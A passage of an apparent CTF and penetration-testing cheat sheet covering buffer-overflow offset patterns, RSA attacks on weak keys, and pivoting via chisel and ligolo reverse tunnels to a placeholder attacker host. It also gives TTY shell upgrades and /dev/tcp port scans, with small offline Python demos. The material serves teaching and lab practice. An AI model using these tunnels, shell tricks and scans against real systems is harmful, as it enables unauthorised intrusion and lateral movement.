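        needle = value.to_bytes(width, "little")[:n].decode("latin-1")
    else:
        needle = bytes(value[:n]).decode("latin-1")
    return cyclic(search_limit, n, alphabet).find(needle)


def all_subsequences_unique(pattern, n=4):
    """The property that makes the offset lookup unambiguous."""
    seen = set()
    for i in range(len(pattern) - n + 1):
        chunk = pattern[i:i + n]
        if chunk in seen:
            return False
        seen.add(chunk)
    return True


if __name__ == "__main__":
    print(cyclic(200))                  # feed this to the crashing input
    print(cyclic_find(0x6161616b))      # EIP=0x6161616b -> offset 40
```

For a 64-bit crash gdb usually reports a non-canonical `$rip` and the pattern bytes end up in `$rsp` instead; pass that value to `cyclic_find` and the offset is the same lookup. `search_limit` caps the generated pattern at 64 KiB, which covers any realistic overflow buffer; with this alphabet and n=4 the full sequence is 26^4 = 456976 bytes before it repeats.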
Cryptography & Encoding

| Command | Description |
|---|---|
| `echo -n "text" \| md5sum` | MD5 hash |
| `echo -n "text" \| sha256sum` | SHA-256 hash |
| `echo -n "text" \| base64` | Base64 encode |
| `echo "dGV4dA==" \| base64 -d` | Base64 decode |
| `echo -n "text" \| xxd -p` | Convert to hex |
| `echo "74657874" \| xxd -r -p` | Convert hex to ASCII |
| `openssl enc -aes-256-cbc -d -in file.enc -out file.dec` | Decrypt AES-256-CBC file (prompts for the password) |
| `openssl rsautl -decrypt -inkey priv.pem -in encrypted -out decrypted` | RSA decrypt with private key (`rsautl` is deprecated in OpenSSL 3; `openssl pkeyutl -decrypt` takes the same arguments) |
| `openssl rsa -in key.pem -text -noout` | Display RSA key details (n, e, d, p, q; add `-pubin` for a public key, which shows only n and e) |
| `openssl x509 -in cert.pem -text -noout` | Read X.509 certificate details |
| `gpg -d encrypted.gpg` | Decrypt GPG file |
| `gpg --import key.asc` | Import GPG key |
| `python3 -c "from Crypto.Util.number import *; print(long_to_bytes(0x48656c6c6f))"` | Hex integer to bytes (pycryptodome) |
| `python3 -c "print(int.from_bytes(b'Hello','big'))"` | Bytes to integer |
| `rsactftool.py --publickey pub.pem --private` | Attempt RSA key factoring and private key recovery (RsaCtfTool) |
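The last row hands the whole job to RsaCtfTool, which hides what "attempt RSA key factoring" actually does. The following is an added example, not from the original page or from RsaCtfTool: it generates a deliberately weak key whose primes are adjacent, factors the modulus with Fermat's method using only the public half, rebuilds the private exponent and decrypts, with `long_to_bytes`/`bytes_to_long` written in plain Python so pycryptodome is not needed. The fixed starting point for the prime search and the message are constructed for the example; everything else is the standard algorithm.

```python
import math

# Deterministic Miller-Rabin: these bases are exact for every n < 3.3e24, which
# comfortably covers the ~128-bit toy modulus used here.
_MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_prime(n):
    if n < 2:
        return False
    for b in _MR_BASES:
        if n % b == 0:
            return n == b
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in _MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def next_prime(n):
    n += 1
    while not is_prime(n):
        n += 1
    return n


def long_to_bytes(x):
    """Same job as Crypto.Util.number.long_to_bytes, without pycryptodome."""
    return x.to_bytes(max(1, (x.bit_length() + 7) // 8), "big")


def bytes_to_long(b):
    return int.from_bytes(b, "big")


def generate_close_prime_key(bits=64, e=65537):
    """Deliberately weak key: q is the next prime after p, the flaw Fermat exploits.
    The start offset is an arbitrary fixed value so the example is reproducible."""
    p = next_prime(2 ** (bits - 1) + 12345)
    q = next_prime(p)
    while math.gcd(e, (p - 1) * (q - 1)) != 1:      # keep e invertible mod phi
        p, q = next_prime(q), next_prime(next_prime(q))
    phi = (p - 1) * (q - 1)
    return {"p": p, "q": q, "n": p * q, "e": e, "d": pow(e, -1, phi)}


def fermat_factor(n, max_iter=1_000_000):
    """Fermat's method: n = a^2 - b^2 = (a-b)(a+b).  Starting at ceil(sqrt(n)),
    a reaches (p+q)/2 after about (q-p)^2 / (8*sqrt(n)) steps, so close primes
    fall out immediately while a properly generated key never finishes."""
    a = math.isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_iter):
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1
    return None


def recover_private_exponent(e, p, q):
    return pow(e, -1, (p - 1) * (q - 1))


def attack_demo(message=b"flag{fermat}"):
    """Encrypt with the public half only, factor n, rebuild d, decrypt."""
    key = generate_close_prime_key()
    n, e = key["n"], key["e"]
    c = pow(bytes_to_long(message), e, n)       # what the challenge hands out
    p, q = fermat_factor(n)                     # attacker knows only (n, e, c)
    d = recover_private_exponent(e, p, q)
    return long_to_bytes(pow(c, d, n))


if __name__ == "__main__":
    print(attack_demo())
```

With a real challenge key, extract `n` and `e` from `openssl rsa -pubin -in pub.pem -text -noout`, hand `n` to `fermat_factor`, and if it returns within a few seconds the primes were too close; if it does not, Fermat is the wrong attack and RsaCtfTool's other strategies (small e, common factors between keys, Wiener) are the next things to try.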
Pivoting & Port Forwarding

| Command | Description |
|---|---|
| `ssh -L 8080:internal:80 user@pivot` | Local port forward: localhost:8080 reaches internal:80 through pivot |
| `ssh -R 8080:localhost:80 user@pivot` | Remote port forward: pivot:8080 reaches port 80 on your machine (bound to pivot's loopback unless `GatewayPorts` is enabled) |
| `ssh -D 9050 user@pivot` | SOCKS proxy on port 9050 |
| `sshuttle -r user@pivot 10.10.10.0/24` | Transparent tunnel to subnet |
| `chisel server -p 8000 --reverse` | Start chisel server (on attacker) |
| `chisel client YOURIP:8000 R:8080:127.0.0.1:80` | Chisel reverse port forward (on target): attacker:8080 reaches the target's 127.0.0.1:80 |
| `chisel client YOURIP:8000 R:socks` | Chisel reverse SOCKS proxy (on target) |
| `ligolo-ng agent -connect YOURIP:11601 -retry -ignore-cert` | Ligolo agent on target |
| `proxychains -q nmap -sT target` | Nmap through SOCKS proxy (TCP connect scans only; SYN scans and ICMP do not traverse SOCKS) |
| `socat TCP-LISTEN:8080,fork TCP:internal:80` | Simple port forward with socat |
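Every entry above is some variant of the same primitive: listen on one address, connect to another, and copy bytes in both directions until each side hangs up. The following is an added example, not from the original page, of that primitive in plain Python with the same semantics as `socat TCP-LISTEN:8080,fork TCP:internal:80`; it also starts a constructed stand-in for "internal:80" on loopback so the whole path can be exercised offline. The half-close handling in `_pump` is the detail that most hand-rolled forwarders get wrong.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes one way until EOF, then half-close the destination so the
    peer sees the same EOF (this is what keeps request/response protocols working)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(listen_host, listen_port, target_host, target_port):
    """socat TCP-LISTEN:<listen_port>,fork TCP:<target_host>:<target_port>.
    Returns (bound_port, stop) so the caller can use an ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(5)

    def serve():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return                      # listener closed by stop()
            try:
                upstream = socket.create_connection((target_host, target_port))
            except OSError:
                client.close()              # target down: drop this client, keep serving
                continue
            # one thread per direction per client == the ",fork" in socat
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv.close


def start_internal_service():
    """Constructed stand-in for 'internal:80': reads the request to EOF and
    answers with a banner that echoes it, so the path through the forwarder is visible."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            request = b""
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                request += chunk
            conn.sendall(b"HTTP/1.0 200 OK\r\nServer: internal\r\n\r\n" + request)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv.close


def demo(request=b"GET / HTTP/1.0\r\nHost: internal\r\n\r\n"):
    """Client -> forwarder -> internal service, all on loopback; returns the reply."""
    svc_port, stop_svc = start_internal_service()
    fwd_port, stop_fwd = start_forwarder("127.0.0.1", 0, "127.0.0.1", svc_port)
    try:
        with socket.create_connection(("127.0.0.1", fwd_port), timeout=5) as c:
            c.sendall(request)
            c.shutdown(socket.SHUT_WR)          # the EOF travels through both pumps
            reply = b""
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                reply += chunk
        return reply
    finally:
        stop_fwd()
        stop_svc()


if __name__ == "__main__":
    print(demo().decode())
```

Run on a pivot host with `start_forwarder("0.0.0.0", 8080, "internal", 80)` and it does the same job as the socat line, which matters when socat is not installed on the box but Python is. It forwards one fixed destination; for arbitrary destinations you want the SOCKS options (`ssh -D`, `chisel R:socks`) from the table instead.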
Miscellaneous One-Liners

| Command | Description |
|---|---|
| `python3 -c 'import pty;pty.spawn("/bin/bash")'` | Spawn TTY shell |
| Ctrl+Z → `stty raw -echo;fg` → `reset` → `export TERM=xterm` → `stty rows 40 cols 160` | Upgrade to full interactive shell |
| `python3 -m http.server 80` | Simple web server (port 80 needs root) |
| `ssh-keygen -t rsa -b 4096 -f id_rsa` | Generate SSH key |
| `for p in $(seq 1 65535); do (echo >/dev/tcp/target/$p) 2>/dev/null && echo "$p open"; done` | Port scan without nmap (bash only; `/dev/tcp` is a bash feature) |
| `for i in $(seq 1 254); do (ping -c 1 10.10.10.$i \| grep "bytes from" &); done` | Ping sweep without nmap |
| `sudo gunzip /usr/share/wordlists/rockyou.txt.gz` | Extract rockyou wordlist |
| `date -d @1609459200` | Convert epoch timestamp |
| `python3 -c "import urllib.parse;print(urllib.parse.quote('string'))"` | URL encode a string |
| `python3 -c "import urllib.parse;print(urllib.parse.unquote('%73%74%72'))"` | URL decode a string |
| `echo "text" \| tr 'A-Za-z' 'N-ZA-Mn-za-m'` | ROT13 encode/decode |
| `md5sum file && sha1sum file && sha256sum file` | Quick checksums (MD5, SHA1, SHA256) |
| `watch -n 1 'ls -la /tmp'` | Watch directory for changes |
| `base64 -w 0 binary > b64.txt` → `base64 -d b64.txt > binary` | Base64 file transfer (`-w 0` keeps it on one line for pasting) |